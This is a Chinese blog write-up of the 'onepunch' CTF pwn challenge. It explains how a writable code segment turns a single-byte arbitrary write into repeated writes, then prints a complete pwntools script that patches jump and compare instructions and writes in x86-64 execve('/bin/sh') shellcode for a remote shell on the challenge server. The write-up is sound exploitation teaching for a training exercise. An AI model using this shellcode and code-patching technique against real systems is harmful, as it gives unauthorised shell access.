hackme inndy pwn onepunch writeup

最新推荐文章于 2022-04-27 18:06:17 发布
最新推荐文章于 2022-04-27 18:06:17 发布
阅读量482 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/charlie_heng/article/details/78941701
版权

继续来做题目,这次的pwn主要功能是一个任意地址写一个字节,然后就结束。。。。

然后找了半天。。。完全没思路。。。一个字节只能写一次。。。。

然后找了下别人的wp,发现代码段居然可以写,那骚操作就可以有很多了

这里写图片描述

这里比较写入的字节是否为255,是的话就输出No flag for you

jnz loc_400773二进制是\x75\x0a 0a是偏移,我们只要把这个弄成负数,就可以跳回上面读取写入地址的地方

然后把jnz loc_400773下面的代码改成shellcode就可以

但是找了几个shellcode,发现很多都有255,那么这里就很简单,只要把cmp 那里的改成比较254就可以

但是如果直接输入 xxxx 254的话就直接过了jnz,这里有个小trick,用-2代替254就行了

下面就是完整的payload

from pwn import *
import time

#p=process('./onepunch')
p=remote('hackme.inndy.tw', 7718)

#context.log_level='debug'

p.recvuntil('What?')

p.sendline('400768 -61')

time.sleep(0.2)

p.sendline('400763 -2')

shell_addr=0x400769

#gdb.attach(proc.pidof(p)[0])
#raw_input()

shellcode='\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05'


#context(arch='amd64',os='linux',log_level='debug')
#shellcode=asm(shellcraft.sh())


for i in range(len(shellcode)):
    p.sendline(hex(shell_addr+i)[2:]+'  '+str(ord(shellcode[i])))
    time.sleep(0.2)

p.sendline('400700 254')

p.interactive()
charlie_heng
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackme pwn onepunch
ACdream
03-14 482
做的题太少了,不知道应该把这种题目如何归类 int __cdecl main(int argc, const char **argv, const char **envp) { …… v5 = __isoc99_scanf("%llx %d", &v6, &v4); if ( v5 != 2 ) return 0; *v6 = v4; …… ...
onepunch的wp
一个码农的笔记
11-15 2964
https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了onepunch这个题目感觉还不错,我把wp分享出来,方便大家学习 onepunch的题目要求是: nc hackme.inndy.tw 7718Punch!这个题目没有太多提示 下面我用ida打开smashthestack这个程序看main函数 这个程序在16行有一个任意地址写的漏洞,程序输入的第
[A]onepunch(tcache stash&&seccomp)
qq_33590156的博客
08-04 186
程序调用的是calloc,这个函数不会从tcache中取chunk。所以直接add free 重复填满tcache,利用uaf泄露heap和libc tcache per thread struct是来管理链表上堆块的数量的,大小一共是0x250,在heap开头。其中counts一共占0x40,每一个字节都代表一个大小范围正好对应64个entry,第一个字节代表0x10,类推。本题中数一数就是对应0x220的size的地方需要大于6,虽然我们可以申请7个0x220的chunk来让他变为7,可以通过if,但是
inndy_onepunch(text段有时是可以修改的)
seaaseesa的博客
05-01 607
inndy_onepunch 用IDA分析一下程序,任意地址写一个字节。 想不到的是,text段可以修改,因此,我们可以直接修改text的指令,来达到多次利用。 #coding:utf8 #想不到text段竟然可以写 from pwn import * context(os='linux',arch='amd64') #sh = process('./onepunch') sh = ...
Hackme.inndy -> Onepunch
aoque9909的博客
08-01 224
Onepunch 这个题的想法必须得称妙了,需要对以往简单的认知进行一定的颠覆。特殊性在于程序的代码段(0x401000)具有写权限 1.通过修改程序代码段控制程序流程 程序中只能对任意一个字节改写一次,似乎没有任何利用空间,但是程序的跳转方式有点特殊,在函数内部大量使用了jz short loc_400756进行跳转。 add:jz及相似的jnz, jmp,等都是两...
pwn栈溢出10道练习题有writeup
01-04
在这个场景中,"pwn栈溢出10道练习题有writeup" 提供了10个关于栈溢出的实战练习,每个题目都配有详细的解答,这对于学习和理解栈溢出漏洞原理及其利用技术非常有帮助。 栈溢出是由于程序在栈上分配的内存不足,...
2017湖湘杯pwn100的题目
11-30
2017湖湘杯pwn100的题目的二进制文件和libc的二进制文件
2023 强网杯 Writeup
最新发布
01-29
CTF Writeup 2023 强网杯 Writeup 是一篇关于 Capture The Flag(CTF)的 writeup,内容涵盖了多个挑战题目,涉及到 Python、 Cryptography、Reverse Engineering、Web 等多个领域。下面是对每个挑战题目的详细分析...
2020 蓝帽杯线下赛PWN WriteUp .pdf
09-05
本文主要涉及的是网络安全领域的Pwn(利用漏洞攻防)技术,具体是针对2020年蓝帽杯线下赛中的一个Pwn题目进行的WriteUp(解题报告)。Pwn类题目通常涉及到缓冲区溢出、格式字符串漏洞、整数溢出等,目标是通过编写...
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
pwn刷题num26-----格式化字符串漏洞实现任意地址修改
tbsqigongzi的博客
04-27 458
BUUCTF-PWN-[第五空间2019 决赛]PWN5 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 开启canary保护-----栈溢出需绕过canary 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 程序运行后首先输入一个name 然后输入密码(passwd) 最后fail ida看一下伪代码 观察主函数,发现格式化字符串漏洞 printf(&buf);
buuoj Pwn writeup 221-225
yongbaoii的博客
08-31 879
221 starctf2018_babystack 222 xm_2019_awd_pwn2 223 jarvisoj_level6 224 hctf2018_the_end 225 inndy_onepunch
实验吧 520app3 writeup
charlie_heng的专栏
01-25 961
这道题在之前比赛的时候也遇到过,当时一脸懵逼……(虽然现在也是差不多 首先先看看怎么动态调试so,这是教程http://blog.csdn.net/feibabeibei_beibei/article/details/52740212 按着教程,把Debugger option的那三个选项给选上,之后也不用取消掉 然后断在linker 之后根据偏移找到​.init_proc 本来想跟下去
hackme inndy pwn echo2 writeup
charlie_heng的专栏
12-30 850
这题做了好久。。。但是学到了很多很骚的思路 做完echo1 ,然后看了下echo2,本来以为只是简单的从32位变成64位,但是发现坑贼多。。。。 首先,用checksec看了下,发现开了pie。。。那就不能简单的改got表,还要用格式化字符串漏洞来泄漏出一个指向程序本身的指针 第二,因为是64位系统,所以一个地址是8个字节,但是这里实际只有6个字节是有内容的,有两个字节是00,所以就不能用p...
Hackme Writeup
热门推荐
wywwzjj
05-21 1万+
https://wywwzjj.top/2019/02/02/Hackme-Writeup/ hide and seek Can you see me? I’m so close to you but you can’t see me. 这题查看源码即可。 guestbook This guestbook sucks. sqlmap is your friend. 既然提示有 sqlmap...
hackme guestbook
weixin_43511698的博客
10-18 629
guestbook 题目提示:This guestbook sucks. sqlmap is your friend. 是sql注入 点击Message List 时是空的, 点击post是可以提交新信息,点击查看新信息 在id值后加上" ’ "测试是否存在测试点网页报错说明存在注入点 union 注入 查看列 https://hackme.inndy.tw/gb/?mod=read&i...
hackme_Login As Admin 6
weixin_30252709的博客
10-23 121
先上源码: 然后发现了一个存在很大漏洞的函数——extract() 众所周知,它有一个最大的漏洞——变量覆盖,即可以通过我们提交的变量把脚本中原来的变量覆盖掉! 通过阅读代码,可以知道它是用$users这个变量来验证我们提交的是否有效, 所以除了提交username&password之外,我们还需要提交一个users,来把原来的$user覆盖掉 所以如此...
Hackme CTF】Web--scoreboard
VZZmieshenquan的博客
04-21 513
Description: DO NOT ATTACK or SCAN scoreboard, you don’t need to do that. Solution: 抓包发现flag在x-flag头里 Flag: FLAG{Header can hide some data aswell.}
二进制利用入门:Pwn挑战解析
"Introduction-to-Pwn.pdf - pwn学习手册" 在网络安全领域,"pwn"是一种专门针对二进制漏洞利用的技术,它涉及到如何利用软件中的安全漏洞来控制或破坏系统。"Introduction to Pwn"这份手册是为那些对中级到高级的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值